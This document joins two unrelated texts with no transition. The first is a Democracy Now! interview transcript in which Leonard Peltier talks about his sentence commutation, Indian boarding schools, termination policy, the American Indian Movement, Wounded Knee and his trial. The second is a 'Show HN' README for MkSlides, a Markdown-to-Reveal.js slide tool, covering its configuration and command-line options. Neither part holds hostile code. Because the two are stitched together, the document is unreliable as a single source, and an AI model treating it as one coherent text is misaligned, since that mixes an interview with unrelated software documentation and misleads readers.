So, let’s go back to that moment when you were in that prison cell in Coleman, in Florida, and you got word that President Biden had commuted your sentence. It was just hours before he was leaving office? Can you tell us about that process, how it took place?
LEONARD PELTIER:
Well, as I went through the years filing for pardons and stuff, Ronald Reagan was the first one to promise to leave me — pardon me. Somebody in Washington stopped it. There’s only one organization that could have stopped it, and didn’t have the power to stop it, but still, somehow, were in power, enough to where they can override a president of the United States, our Congress. It’s the FBI. And Reagan promised to let me go. And the FBI intervened, and that was stopped. And Bill Clinton and Obama, and, finally, we get to Biden.
And Biden, there was pressure put on him from all over the world. Almost every tribal nation here in the United States filed for my release, demanding my release. The United Nations — the United Nations did a full report on my case, and they demanded that I be released immediately and to be “paid,” quote-unquote. Hundreds of Congress and senators and millions of people —
AMY GOODMAN:
And the pope.
LEONARD PELTIER:
And the pope, two popes, the last pope and the current pope. And world leaders, many world leaders, demanded my release.
AMY GOODMAN:
The Nobel Peace laureate, bishop — Archbishop Desmond Tutu?
LEONARD PELTIER:
Yes. I was also nominated for — and nominated four times, because of my work from prisons, for a Nobel Prize. And the board and everything granted it, but somebody intervened again. So, four times, I lost that.
I think somebody was pushing Biden to stop any — any possibility of signing a pardon. So, he didn’t sign it until the last moment. And actually, a day and a half before he actually signed it and he was — his term was completed, I just took the position that, “Nah, he’s not going to do this.” And I just kind of laid back in my cell, and I thought to myself, “Well, I guess I die here, and this is the only ultimate sacrifice I can make, and I have to accept it. I have no other choice.”
And as I laid there and thinking about it, other people came by — even guards would tell me, “Don’t give up, Leonard. Don’t give up.” And other prisoners, and some of them prisoners were telling me that, “Leonard, he’s got to know that if he doesn’t sign this, this is political suicide for the Democratic Party, because there’s millions of people that are going to break away from this if he doesn’t.”
And so, I was laying there, and I was thinking, “Well, let’s try one more thing.” So I called a representative of mine that was working closely with the Biden administration. We got — we have Native people — we had Native people in his administration who were communicating with Biden. And I said, “Tell him to give me a commutation on my sentence and home confinement.” So, she called and did this, and that’s what I ended up with. And that’s what I’m — that’s what I’m living under right now.
AMY GOODMAN:
How did you hear that you were going to be free?
LEONARD PELTIER:
Well, it was kind of unbelievable in the immediate moment. I thought somebody was just playing games with me. And I thought, “Ah, I’m going to wake up, and this is all a dream, and I’m in the cell, and I’ll be in there.” And I really didn’t believe it until, actually, I walked in the house here.
AMY GOODMAN:
What was it like to leave Coleman?
LEONARD PELTIER:
Wow! Imagine living in a cubicle larger than some people’s closets for all those years, and then you finally are able to walk out of there. I mean, it was just — for me, it was unbelievable that this was actually happening to me. But, I mean, the feeling of, wow, I can go — I’ll be home. I won’t be able to — I won’t have to go to bed in this cold cell with one blanket, and I won’t have to smell my celly going to the bathroom. I won’t have to eat cold meals. Is this really over for me? Is this really going to be over for me? And it was disbelief. A lot of it was disbelief, really.
AMY GOODMAN:
And now we’re sitting here in your living room surrounded by the paintings you did in prison.
LEONARD PELTIER:
Yes.
AMY GOODMAN:
You are an artist extraordinaire, maybe about to have a gallery showing in New York. Through the years, you sold your paintings. Talk about painting in prison and how you came to be a painter.
LEONARD PELTIER:
Well, see, a lot of people think we were allowed to paint in our cells and stuff. We were not. We were not allowed. They had an art room, hobby craft area, and one of the — one of the hobby crafts was painting. So, you have to sign up for that. A lot of people think that all the art supplies was given to you by the prison, the hobby crafter. That’s not true, either. We have to buy our own. And I went and signed up immediately to go into the art hobby craft. And I used to go there every day, and that’s what I did. I painted and painted and painted ’til I was able to create my own style and everything, yeah.
AMY GOODMAN:
Can you see your paintings now?
LEONARD PELTIER:
No. Two months ago, I think now, I lost 80% of my vision. And I’m in the process of, hopefully, getting my eyesight returned, treated and returned.
AMY GOODMAN:
We’re spending the hour with the Indigenous leader, longtime political prisoner, Leonard Peltier. He was released in February from prison after nearly half a century behind bars. Coming up, he talks about being put in an Indian boarding school as a child, his activism and more. We’ll also speak with his daughter, Marquetta Shields-Peltier. She was just a toddler when her father was imprisoned in 1976.
[break]
AMY GOODMAN:
This is Democracy Now!, democracynow.org, The War and Peace Report. I’m Amy Goodman.
We’re continuing with our conversation with longtime Indigenous activist Leonard Peltier in Belcourt, North Dakota. I spoke to him there on his 81st birthday weekend on the Turtle Mountain Band of Chippewa Cree Reservation. He was released in February from the federal prison in Florida after nearly half a century behind bars.
AMY GOODMAN:
So, take us back in time. Introduce us to you, starting by saying your name, who your parents were, the nations they were a part of, your family, where you lived growing up.
LEONARD PELTIER:
OK. My name is — English name is Leonard Peltier. I’m 81 years old as of yesterday. My father is a Chippewa Cree, from this reservation, this nation right here.
I keep saying “reservations,” because we was trained — we was taught from childhood that we are all reservations, we’re Indians. And we’re not Indians, and this is not a reservation. We made treaties with the United States government, and the Constitution says they shall only make treaties with sovereign nations. So we’re sovereign nations. We’re not — we’re not Indians, as they claim to be — they claim we are.
And my mother is from Fort Totten. But again, that’s not the real name. The real name is Spirit Lake, and that’s of the Lakota/Dakota people.
I was raised, majority of my life, here with my grandparents, which is usually the traditional way of my people. The grandparents will take the children and raise them. But when grandpa died, grandma had no way, no way to support us, so she went to the agency here to ask for help. And in retaliation, they took us and put us in a boarding school.
AMY GOODMAN:
What boarding school?
LEONARD PELTIER:
Wahpeton, North Dakota, 1953. I was there ’til — for three years, ’56. And it was extremely brutal conditions.
AMY GOODMAN:
How old were you?
LEONARD PELTIER:
I was 9 then, when I went. And —
AMY GOODMAN:
Talk about the point of these boarding schools. Was your hair cut? Did they stop you from speaking your language?
LEONARD PELTIER:
Of course. They did all — they did — that was the purpose of the schools, is to take the Indian out of the Indians, is what they literally — was the order. They took us to the boarding schools. The first thing they did was cut all our — buzz cut our hair, took it all off, and then put us and took us into the shower. We showered, and we come out of the shower, and we were poured all over our bodies DDT. As you know, that’s poisonous.
AMY GOODMAN:
They poured DDT over your body?
LEONARD PELTIER:
They poured DDT, with all the cans, on your head, the whole body. And then they gave us — issued clothes, bedding and assigned us to a bed. And that was the beginning of our treatment. It was an extremely, extremely strict school, and beatings were regular for any little violation of those rules.
I might have been a little hot-headed, I don’t know. But when I first got there, there was a group. They called themselves the Resisters. And I immediately joined them, and I became part of the Resisters. So, we would sneak behind the gymnasium, and we would talk our language. We would sing some song, even do some prayers, yeah. And if we got caught, we got the [bleep] beat out of us.
AMY GOODMAN:
You wrote in your book, Prison Writings: My Life Is My Sun Dance, that you consider these boarding schools your first imprisonment.
LEONARD PELTIER:
Yes, it was. Was. I found the rules more restrictive than when I went — ended up in prison.
AMY GOODMAN:
So, you go to this residential school with your cousin and sister for three years. Where do you come back to? And how did you maintain your language and your culture?
LEONARD PELTIER:
Well, I came back here to live with my father. And they were still living in log cabins, no electricity, no running water. We had to haul water. We had to haul wood. And we only had $55 to live on, which was my father’s World War II military benefits, and that’s what we had to live on.
And we were facing the — we were facing the time of termination. The United States government wrote a bill, passed by Congress, signed by the president, of termination in 1956. It was supposed to be completed by 1985. And the first one to be terminated was the Menominee Indians of Wisconsin. They had millions of making — millions of prime land, timber and lakes to make hunting lodges and other things out there. It was beautiful, which they do today. They still — they got all those things out there today. But they came and took all that land from them. Then they come here in 1958. Was it ’58? Yeah, ’58. I was 13 years old then. And they came and told us we have been terminated, and we have to accept that. We were supposed to be the second reservation to be terminated.
AMY GOODMAN:
The Turtle Mountain Band of Chippewa Cree.
LEONARD PELTIER:
Turtle Mountain Band of Chippewa Cree, yes. And my father and all of them and their generation, a lot of people left on relocation. They said, “It’s hopeless. We can’t fight these people. They’re too powerful. They got — they’re just too powerful. You know, maybe life will be better over there,” and stuff like this on this relocation. So they picked the city to go to. A lot of them went to Washington state and Oregon.
And it was a small group of us stayed here and said, “No, we’re not leaving.” So, my dad and his generation said, “Well, what do you mean, 'been terminated'? You can’t come here and tell us that we got to leave and you’re going to just terminate us as a race of people and tell us that we no longer exist. Go [bleep] yourself. Come on. Let’s fight it out.” And literally, they were — I was proud of them. I was 13 years old.
They stopped all provisions. One little girl died over here from malnutrition, and that’s what really got everybody angry.
AMY GOODMAN: So they thought they would starve you out.
LEONARD PELTIER: Yeah, they were making conditions so hard that we were accepting termination. We were leaving. A lot of people took to say, “Well, at least my kids won’t starve to death.”
AMY GOODMAN: And the BIA reversed its decision?
LEONARD PELTIER: They reversed their decision and gave us $50 —
AMY GOODMAN: Vouchers?
LEONARD PELTIER: Vouchers to go buy groceries here in Rolla. Everybody got — the whole reservation got $50.
AMY GOODMAN: And they didn’t disband the reservation?
LEONARD PELTIER: No, they got the hell out of here, because we told them we’re going to fight them.
AMY GOODMAN: So, this was really the beginning of the Red Power Movement and the founding of AIM, right?
LEONARD PELTIER: Well, I guess so, in so many — yeah, in so many — yeah.
AMY GOODMAN: The American Indian Movement.
LEONARD PELTIER: Yeah.
AMY GOODMAN: Which you want to rename the American —
LEONARD PELTIER: But they were — but they were doing that for — I mean, my people have been fighting back for 500 years, Amy.
AMY GOODMAN: But the modern day.
LEONARD PELTIER: Yeah, the modern-day stuff. But no, we went to war with them. We went to all kinds of different levels of —
AMY GOODMAN: Resistance?
LEONARD PELTIER: Resistance, you know.
AMY GOODMAN: So, talk about the founding of AIM, the American Indian Movement, which you today would like to rename the American Indigenous Movement.
LEONARD PELTIER: Well, I was involved in a number of different organizations before I joined AIM. And one of the biggest ones that I was — I helped organize the United Tribes of All Indians in Washington state. And we took over Fort Lawton. One of the treaties that we were pushing them days — actually, our people was — older people were pushing this, too, but they just passed. All of our knowledge came from traditionalists. That’s the policies, the American Indian Movement, we followed there. There.
First of all, people got to understand, the American Indian Movement policy is they can’t come onto this reservation, start dictating their policy. They have to be invited by the traditionalists or a tribal government or what else. We can’t just go onto a reservation and say, “You’re going to do this, you’re going to do that.” No, we can’t do that, and we don’t do that. We have to be invited first.
So, anyway, this was before I joined the American Indian Movement. I was involved with the fishing and hunting struggles over there. That was a big area that they really fought hard and got really —
AMY GOODMAN: Fishing and hunting rights.
LEONARD PELTIER: Yes, treaty rights. In fact, Marlon Brando got arrested with us in 1955. He got arrested on one of them lakes. I wasn’t there, but he was — he got arrested fishing and hunting with the Natives out there.
AMY GOODMAN: So, talk about the occupation of the BIA offices in Washington, moving on to Wounded Knee and Pine Ridge.
LEONARD PELTIER: Well, it just — our resistance became extremely popular. American Indian Movement was growing, and not just here in America — Canada, Central America. Said, “Wow! There are a lot of full bloods all through Central America,” more than people — more than here in the United States. And we were uniting with all of them, all those Natives across this country — across this whole continent, I mean. And we were uniting. We were pulling them together with the American Indian Movement. That’s why we became a threat to the government so.
And later, later on, when I was arrested — after I got arrested, this one guy was telling me, he said, “You know, I just went down to Mexico someplace, one of them towns.” And he said they were organizing for resistance and stuff like this. He said, “I was down there, down there visiting them.” He said, “I went to this old — this guy told me he was the — he was some kind of medicine man or something. So I went down and visited him, and so I went into his place,” into his — he had kind of a hut-like home, I guess. And he said, “What do I see?” He said, “I see your poster on one of the walls.” That’s so far back. But I wasn’t. We went through all that stuff. And so, anyway —
AMY GOODMAN: But especially for young people to understand, I mean, you’re talking about this critical moment of 1973, ’4 and ’5.
LEONARD PELTIER: ’60s, actually.
AMY GOODMAN: What’s that?
LEONARD PELTIER: Started in the ’60s, really.
AMY GOODMAN: And also the height of the antiwar movement. And the role and the effect of the antiwar movement on the Native American movement, and vice versa? If you can talk about those critical moments?
LEONARD PELTIER: We were — I was, and others were, a lot of us Natives were — we were also involved in the peace marches and with the Blacks and the antiwar movements and things like that. We were involved in all that stuff, too. But we were working on trying to get their support, and they were working on trying to get our support. Then the hippies came out, and the hippies really helped us. The hippies did a lot to help us. They started dressing like Natives. They started doing things like Native people. And a lot of them came from very, very wealthy families. A lot of people hated them. That’s one of the reasons the government hated them, is because they were really pushing the Native issues, the culture and stuff like that.
AMY GOODMAN: So, the Trail of Broken Treaties, that was 1972. Explain what it was, which was a takeoff on the Trail of —
LEONARD PELTIER: Well, we knew that we had to get to — get the government to start honoring our treaties, because they never honored our treaties. And the only way we could do this is to go right straight to Washington. And so, we organized a group. We called it the Trail of Broken Treaties. And we all organized from all over the country. They sent representatives in old cars. We had all — nobody had new cars them days. And we all went to Washington.
AMY GOODMAN: You went?
LEONARD PELTIER: Of course, I did. Of course, I was there, too, yeah.
AMY GOODMAN: This is, of course, a takeoff on the Trail of Tears. And most people, in our schools, and maybe less so especially now, will ever even know what the Trail of Tears was.
LEONARD PELTIER: Right, right, right, precisely. That was all past — everything we did, we called it — well, like the Trail of Broken Treaties, that was done out of the Trail of Tears, and the Long Walk, all them other events like that that happened. It wasn’t just the Trail of Tears. That’s what people have to understand. It was — the Trail of Tears was just one of them that became so well known, because I think 10,000 people died on that, and just laying alongside the trails and stuff from dying from sickness, malnutrition, all that stuff, on the Trail of Tears. And that’s why it got so —
AMY GOODMAN: This was President Andrew Jackson?
LEONARD PELTIER: Yes, yeah.
AMY GOODMAN: The president who President Trump reveres.
LEONARD PELTIER: It was [bleep] order, yeah. He was a anti — he was a hater. And so, we were prevented. We organized. We organized under basically the same policies of exposing what was done in the past, what continued to be done.
And we still find it’s still happening today, Amy. Ann Coulter had made a public statement that — about Native people, that we didn’t kill enough of them Indians. That’s a very dangerous thing to say about anybody, because there’s a bunch of nuts out there, like, you know, you take one of them haters and everything, he can end up killing a lot of innocent Natives for — just because those type of words.
You got a president trying to do away with our treaties. If our treaties go, we go. This is the only thing to prove that we are a sovereign nation and a race of people. And if that goes, we go, as a race of people. So, it’s not — I mean, it’s not ending for us. We’re still in danger. Yeah, you see it happening in the streets, you know, I mean, right today. Look at what they’re doing in Palestine, killing women, children, babies, unborn babies. That’s what they did to us, man. And here it is still happening.
AMY GOODMAN: So, 52 years ago, 1973, the start of the American Indian Movement’s 71-day occupation of the village of Wounded Knee on Pine Ridge Reservation, occupation helping draw international attention to the plight of Native Americans, the U.S. government responding to the occupation with a full military siege that included armored personnel carriers, F-4 Phantom jets, U.S. Marshals, FBI, state and local enforcement. During the occupation, two Sioux men shot dead by federal agents, and a Black civil rights activist, Ray Robinson, went missing. The FBI confirmed in 2014, decades later, that Ray Robinson had been killed during the standoff. Most people don’t know about this history.
LEONARD PELTIER: No.
AMY GOODMAN: Maybe they’ve heard the book Bury My Heart at Wounded Knee. So, can you talk about Pine Ridge and Wounded Knee, especially for young people who don’t know the history?
LEONARD PELTIER: Well, I was in jail during the beginning of Wounded Knee, but I got out. It was about halfway through. Then I went, and I went up there, and I helped pack in stuff into Wounded Knee. And I stayed out there on the outside forces.
After we made all those trips to Washington and all that stuff, all those other demonstrations, and all those promises, they were going to do this and do that. They were going to investigate everything, all of our accusations and all that stuff. And we soon found out — we knew anyway, but we soon found out that was all a lie. They weren’t going to investigate [bleep]. And they didn’t.
And so, finally, the elders and the chiefs made the decision to go to Wounded Knee. AIM had no part in that decision. We cannot go anyplace in Indian Country and make policies. We can’t. That’s not — that is not us. We can’t do that. And we can’t go unless we’re invited by those people. And they just got fed up with so many more false promises and what was happening.
They were being terrorized by a group organized by — a mercenary group, I might add. They were provided with intelligence, armored person ammunition, sophisticated weapons, surveillance and stuff like this, automobiles and stuff. And the leader made that — admitted that on a national interview. So we know that’s all true. They tried to deny it at first, but they called themselves the Guardians of the Oglala Nation. And —
AMY GOODMAN: The GOONs.
LEONARD PELTIER: The GOONs, yeah.
AMY GOODMAN: Dick Wilson’s.
LEONARD PELTIER: Dick Wilson, all them. Nixon ordered the 82nd Airborne to go and investigate what’s going on down there. And if there was — if we were like the government was claiming, that we were communists and Marxists, and we were being financed by the communists, they were to go up there and wipe us out.
When Nixon got the 82nd Airborne involved in it, we filed a lawsuit. And it took us 10 years, but we got all this information out of the files that they had to turn over to us, right? And we found that they had went to the armory and checked out 250,000 rounds of various caliber ammunition, different sophisticated weaponry, armored personnel carriers, and finances and surveillance and stuff like that. See, that was all illegal. And that’s how we found out a lot of stuff about what they were doing there. And it was all illegal. If it would have been left to Nixon, he would have — he was going to wipe us out. But he didn’t, because, we heard, his wife stepped forward and said, “No, don’t you do that.”
AMY GOODMAN: Now, still going back 50 years, what landed you in jail? I want to go to the words in Democracy Now! in 2003. The occupation of Wounded Knee is considered the beginning of what Oglala people refer to as the Reign of Terror, from ’73 to ’76, over 60 residents killed in this period. Murders went uninvestigated by the FBI, which had jurisdiction. The period culminating in the June 26th shootout for which Leonard Peltier was imprisoned.
LEONARD PELTIER: First of all, I don’t know who the shooter is, or shooters. And I don’t — I wouldn’t tell you if I did know, so I’m not going to tell you anything in that area. But I’ll tell you — I’ll speak on the other issues, because it’s public knowledge, and it’s been — it’s been our attempts to continue to expose that stuff.
But there was a lot of Native people, traditionalists, whose homes were burned, whose houses were — was drive-by shootings. People were pulled over and beaten, and some shot, some killed. And those things are literally recordings on this. We got records of all this stuff now, so people can’t deny this stuff. The only ones that are denying this [bleep] is the United States government and the FBI and people like that.
But we faced a time called the Reign of Terror, when they were getting away with all this [bleep]. None of them were getting investigated. A lot of the older people that seen these people identified them, but the FBI still wouldn’t investigate. They were able to kill people at random. They were — and getting away with it, because they didn’t have — they had no fear of being prosecuted. The only fear they had was of us, the American Indian Movement, because we wouldn’t take their [bleep]. Every chance we got together, we got a confrontation with them. And that’s the only fear they had of anything, of any retaliations, any arrests or anything else.
AMY GOODMAN: We’re spending the hour with Indigenous elder Leonard Peltier. He was released in February from prison after nearly 50 years behind bars. Stay with us.
[break]
AMY GOODMAN: This is Democracy Now!, democracynow.org. I’m Amy Goodman, as we continue our conversation with Indigenous leader Leonard Peltier, released to home confinement in February after nearly half a century behind bars. I asked him about his claims that his extradition from Canada and trial in the United States were marked by prosecutorial misconduct.
AMY GOODMAN: Talk about the coerced testimony of Myrtle Poor Bear, who she is.
LEONARD PELTIER: Who is she?
AMY GOODMAN: I mean, I know you didn’t know her at the time.
LEONARD PELTIER: I never knew her. Her father came to my — was going to come testify at my trial that she had a serious mental problem. And her sister was going to testify that on the day of the shootout, they were sitting there drinking beer. And we got this all on tape. And they were sitting there drinking, drinking beer, and they ran out of beer. And they were watching TV, she said, and they decided to make a run off the reservation, because it was a dry reservation. No alcohol was allowed there. And so, she says, to go buy some more beer, come back and watch some more TV. And they started driving down the road, and all of a sudden a bulletin came over the radio: a big shootout in Oglala between the Marshals, FBI, BIA cops, GOON squads against the American Indian Movement. So they were over 50 miles away. Finally, Myrtle admitted that she didn’t know me.
AMY GOODMAN: But she — her testimony said that —
LEONARD PELTIER: Her testimony in the grand jury is what got us all indicted.
AMY GOODMAN: Said she was your girlfriend and she had seen —
LEONARD PELTIER: She witnessed — oh god.
AMY GOODMAN: Seen all of this.
LEONARD PELTIER: When the lawyers came to me in Canada, they said, “Leonard” — they said, “Leonard, we got bad news for you.” And I said, “Yeah? What kind of bad news?” And they said, “Your girlfriend’s testifying against you.” And I looked at him, and I said, “My girlfriend? What do you mean? My girlfriend?” Said, “Your girlfriend.” And I said, “I don’t have a girlfriend. I got a wife, two kids.”
AMY GOODMAN: So, talk about James Reynolds, the former U.S. attorney in charge of the prosecution, that helped convict you. He later becomes an advocate for your release, stating the prosecution could not prove that you had committed any offense and the conviction was unjust. He wrote to president after president — he himself was appointed by Carter — right through to Biden.
LEONARD PELTIER: Yes. Well, about 10 years ago, James Reynolds started to have a change of heart, I guess. James Reynolds said that there is no evidence Leonard Peltier committed any crimes on that reservation. And that’s pretty — he was in charge of everything.
AMY GOODMAN: What this ultimately leads to is your imprisonment for 49 years.
LEONARD PELTIER: Yeah.
AMY GOODMAN: The majority of your life behind bars, what this institutionalization meant for you, what it meant to be both a prisoner and considered a political prisoner around the world and a symbol of the fight for Native American rights and what happens to you when you engage in it, all of those things?
LEONARD PELTIER: Well, OK, I think — I’ve been asked this question quite a bit, and it’s hard for me to answer. But I think that what really kept me strong was my anger. I was extremely angry about what they did to me and my people. And I’m still — still very, very [bleep] angry. And there was no way in hell I was going to get justice. I could have had — I had at least 14 constitutional issues that I should have been released on, at least that many, and I knew I wasn’t going to get it. I knew what it was — the courts were not going to give it to me. And, I mean, even the Supreme Court would refuse to hear my case and stuff like that. But I knew why. You know, I found evidence of them meeting with Judge Heaney. And Judge Heaney became a strong advocate for my release. But we found evidence he worked with the FBI.
And I just — I felt so much hate and anger, and what they — what they did to Native people in this country, this continent, and that kept me strong. It kept me from — oh, kept me from — I’ve been offered numerous times, or a few times anyway, that if I accepted responsibility and made statements, that everything we’ve said negative about the United States government, what their past history was, and their dealings with our — with us, as people in the nation, they would turn me loose. And I refused to do that. I refused to bow down to them. And I still refuse to bow down to them. I’m going to die with my beliefs. And I just refuse to — to me, it’s treason against my nation, my people.
AMY GOODMAN: You’re a major symbol of Indigenous power, not only in the United States, but around the world. What does that mean to you?
LEONARD PELTIER: Well, I hope I can use it to benefit my people. I mean, as I said earlier, we’re still in danger. It’s not over for us. We don’t get to live like the rest of the people in this country, without fear of what would happen to us if we had our treaties taken away from us. We don’t get to live like that. We still have to live under that, that fear of losing our identity, losing our culture, our religion and stuff. Most Americans don’t have to worry about that. We do. And so, the fight for, the struggle still goes on for me. I’m not going to give up. I’m not going to — I have not surrendered. I don’t want to go back to prison, although I heard that Trump was going to try to take away all of Biden’s pardons and everything else like that.
AMY GOODMAN: What would you say to young Indigenous people? I’m looking behind you at a photograph of — is it a picture of your great-granddaughter?
LEONARD PELTIER: Yeah, this one, right here.
AMY GOODMAN: And she’s wearing a T-shirt that says “strong.” How old is she?
LEONARD PELTIER: She’s now 11. Now 11. We adopted her when she was a little baby, been taking care of her ever since. And she loves me and thinks I’m the greatest thing in the world. I love her because she is the greatest thing in the world. And she was — she’s now a champion fly swimmer. She was going to — her plan was, if she wins the Olympics, she was going to take those Olympics and say, “This is for my grandpa, Leonard Peltier, who they illegally put in prison. This is for him.” I said, “Where did you come up with that?” She won’t say, but she just looks at me, yeah.
AMY GOODMAN: You know, we’ve been covering the climate movement for so many years, were here in North Dakota covering the standoff at Standing Rock, the Sioux-led, Indigenous-led global movement to preserve the environment. And this year, the U.N. climate summit is in just the tip of the rainforest, Belém in Brazil. And each of these U.N. climate summits, we see Indigenous people, especially young Indigenous people, there fighting for the planet. Do you see the voice of Indigenous people on the climate movement as hopeful?
LEONARD PELTIER: We’ve been talking about this for 250 years — or, no, since America was first organized. We still — when we pray and when we — whatever we do, we still talk about Mother Earth and other environment stuff. We haven’t stopped. We never will stop. You know, we are still strong on environmentalists.
AMY GOODMAN: Well, Leonard Peltier, I want to say thank you so much for inviting us into your home. I’m so glad we’re not coming to a prison.
LEONARD PELTIER: Well, so am I.
AMY GOODMAN: Indigenous leader Leonard Peltier, speaking in September at his home on the Turtle Mountain Reservation in North Dakota on his 81st birthday weekend.
Show HN: MkSlides – Markdown to slides with a similar workflow to MkDocs
Use mkslides to easily turn Markdown files into beautiful slides using the power of Reveal.js!
MkSlides is a static site generator that's geared towards building slideshows. Slideshow source files are written in Markdown, and configured with a single YAML configuration file. The workflow and commands are heavily inspired by MkDocs and reveal-md.
Features
Build static HTML slideshow files from Markdown files.
Turn a single Markdown file into an HTML slideshow.
Turn a folder with Markdown files into a collection of HTML slideshows with an index landing page.
Publish your slideshow(s) anywhere that static files can be served.
Locally on your own device.
On a web server.
Deploy through CI/CD with GitHub/GitLab (like this repo!).
E.g. when your Markdown files are located in the slides/ folder:
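mkslides build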
If the slides folder doesn't exist, it will fall back to docs for backwards compatibility. If docs also doesn't exist, it will error.
E.g. when your Markdown files are located in the somefolder/ folder:
mkslides build somefolder/
E.g. when you have a single Markdown file called test.md:
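mkslides build test.md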
⚠️ When you use a single file as PATH, only default static assets will be copied to the output folder. If you want to include images or other files, create a folder instead and pass that as PATH. Using a file as PATH is meant more for a quick slideshow in a pinch using only text.
Just create a mkslides.yml. All options are optional; you only have to add what you want to change to mkslides.yml.
Relative file paths are considered relative to the directory containing Markdown files (PATH).
Here's an example showcasing all possible options in the config file:
# Configuration for the generated index page
index:
  # Enables or disables the "Documentation built with MkSlides." footer:
  # boolean
  enable_footer: true
  # Favicon of the generated index page: file path or public url to favicon
  # file
  favicon: example-index-favicon.ico
  # Navigation section describing how to structure the slides on the index
  # page. This is similar to the `nav` option from MkDocs: list[any]
  nav:
    - Example: example1.md
    - "Example 2": somewhere/example1.md
    - example3.md
    - somewhere/example4.md
    - "More examples":
        - example5.md
        - "Much more examples":
            - "Last example": somewhere/much/more/examples/example6.md
  # Title of the generated index page: string
  title: example-title
  # Jinja 2 template to generate index HTML: file path to Jinja2 file
  template: example.jinja
  # Theme of the generated index page: file path or public url to CSS file
  theme: example-index-theme.css

# Configuration for the slides
slides:
  # Charset of the slides: string
  # (see https://revealjs.com/markdown/#external-markdown)
  charset: utf-8
  # Favicon of the slides: file path or public url to favicon file
  favicon: example-slides-favicon.ico
  # Theme for syntax highlighting of code fragments on the slides: file path
  # to CSS file, public url to CSS file, or one of the highlight.js built-in
  # themes such as `monokai`, `obsidian`, `tokyo-night-dark`, `vs`, ...
  # (see https://highlightjs.org/examples)
  highlight_theme: example-slides-highlight-theme.css
  # Relative path to a python script containing a function
  # Callable[[str], str] named `preprocess`. Important: a relative file path
  # here is considered relative to the configuration file, as you probably
  # don't want to serve the python scripts.
  # For each Markdown file, the whole file content is given to the function as
  # a str. The returned string is then further processed as the Markdown to
  # give to Reveal.js
  preprocess_script: tests/test_preprocessors/replace_ats.py
  # Separator to determine notes of the slide: regexp
  # (see https://revealjs.com/markdown/#external-markdown)
  separator_notes: "^Notes?:"
  # Separator to determine end current/begin new vertical slide: regexp
  # (see https://revealjs.com/markdown/#external-markdown)
  separator_vertical: ^\s*-v-\s*$
  # Separator to determine end current/begin new slide: regexp
  # (see https://revealjs.com/markdown/#external-markdown)
  separator: ^\s*---\s*$
  # Jinja 2 template to generate index HTML: file path to Jinja2 file
  template: ./example.jinja
  # Theme of the slides: file path to CSS file, public url to CSS file, or one
  # of the reveal.js themes such as `black`, `white`, `league`, `solarized`,
  # `dracula`, ... (see https://revealjs.com/themes/)
  theme: example-slides-theme.css
  # Title of the slides. If this is set for a slide, it will be used for the
  # entry in the generated index HTML: string
  title: example-title

# Options to be passed to reveal.js: options in yaml format, they will be
# translated to JSON automatically (see https://revealjs.com/config/)
revealjs:
  height: 1080
  width: 1920
  transition: fade
  example_plugin:
    example_plugin_option_A: true
    example_plugin_option_B: qwerty

# Plugins or additional CSS/JavaScript files for the slides. These are given as
# a list.
plugins:
  # Name of the plugin (optional, see plugin README): plugin id string
  # (see https://revealjs.com/creating-plugins/#registering-a-plugin)
  - name: RevealExamplePlugin
    # List of CSS files of the plugin (optional, see plugin README):
    # public url to CSS file per entry
    extra_css:
      - https://cdn.jsdelivr.net/npm/reveal.js-example-pluging/example.min.css
    # List of JavaScript files of the plugin (optional, see plugin README):
    # public url to JavaScript file per entry
    extra_javascript:
      - https://cdn.jsdelivr.net/npm/reveal.js-example-pluging/example.min.js
  - name: RevealMermaid
    extra_javascript:
      - https://cdn.jsdelivr.net/npm/reveal.js-mermaid-plugin/plugin/mermaid/mermaid.min.js
  - extra_javascript:
      - https://cdn.jsdelivr.net/npm/reveal-plantuml/dist/reveal-plantuml.min.js
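As an illustration of the preprocess_script hook described in the example configuration above, a script only needs to expose a function named preprocess that takes the full Markdown content as a string and returns the string handed to Reveal.js. The placeholder name and replacement below are invented for this example.

```python
# Minimal example preprocess script for MkSlides: MkSlides calls the
# `preprocess` function with the whole Markdown file content as a string
# and uses the returned string as the Markdown given to Reveal.js.
def preprocess(markdown: str) -> str:
    # Replace a made-up placeholder before the slides are rendered.
    return markdown.replace("@@COURSE@@", "Introduction to MkSlides")
```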
Default config (also used if no config file is present):
index:
  enable_footer: true
  template: assets/templates/index.html.jinja # Comes with the pip package
  title: Index
slides:
  highlight_theme: monokai
  template: assets/templates/slideshow.html.jinja # Comes with the pip package
  theme: black
revealjs:
  history: true
  slideNumber: c/t
It is also possible to override slides, revealjs, and plugins options on a per-Markdown-file basis using its frontmatter. Here, relative file paths are considered relative to the Markdown file itself.
---
slides:
  theme: solarized
  highlight_theme: vs
  separator: <!--s-->
  title: Frontmatter title.
revealjs:
  height: 1080
  width: 1920
  transition: zoom
---

# Slides with frontmatter

<!--s-->

## Lorem ipsum
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
<!--s-->
Notes:
title here is a frontmatter-only available option to set the title of this slideshow in the generated index page. This option is not available in mkslides.yml.
The precedence is frontmatter > mkslides.yml > defaults.
Full help
Usage: mkslides [OPTIONS] COMMAND [ARGS]...
MkSlides - Slides with Markdown using the power of Reveal.js.
Options:
-V, --version Show the version and exit.
-v, --verbose Enable verbose output
-h, --help Show this message and exit.
Commands:
build Build the MkSlides documentation.
serve Run the builtin development server.
Usage: mkslides build [OPTIONS] [PATH]
Build the MkSlides documentation.
PATH is the path to the directory containing Markdown files. This argument
is optional and will default to 'slides', or 'docs' if the first directory
doesn't exist. If PATH is a single Markdown file or a directory containing a
single Markdown file, it will always be processed into `index.html`
regardless the name of the Markdown file.
Options:
-f, --config-file FILENAME Provide a specific MkSlides-Reveal config file.
-d, --site-dir PATH The directory to output the result of the slides
build. All files are removed from the site dir
before building.
-s, --strict Fail if a relative link cannot be resolved,
otherwise just print a warning.
-h, --help Show this message and exit.
Usage: mkslides serve [OPTIONS] [PATH]
Run the builtin development server.
PATH is the path to the directory containing Markdown files. This argument
is optional and will default to 'slides', or 'docs' if the first directory
doesn't exist. If PATH is a single Markdown file or a directory containing a
single Markdown file, it will always be processed into `index.html`
regardless the name of the Markdown file.
Options:
-f, --config-file FILENAME Provide a specific MkSlides-Reveal config file.
-s, --strict Fail if a relative link cannot be resolved,
otherwise just print a warning.
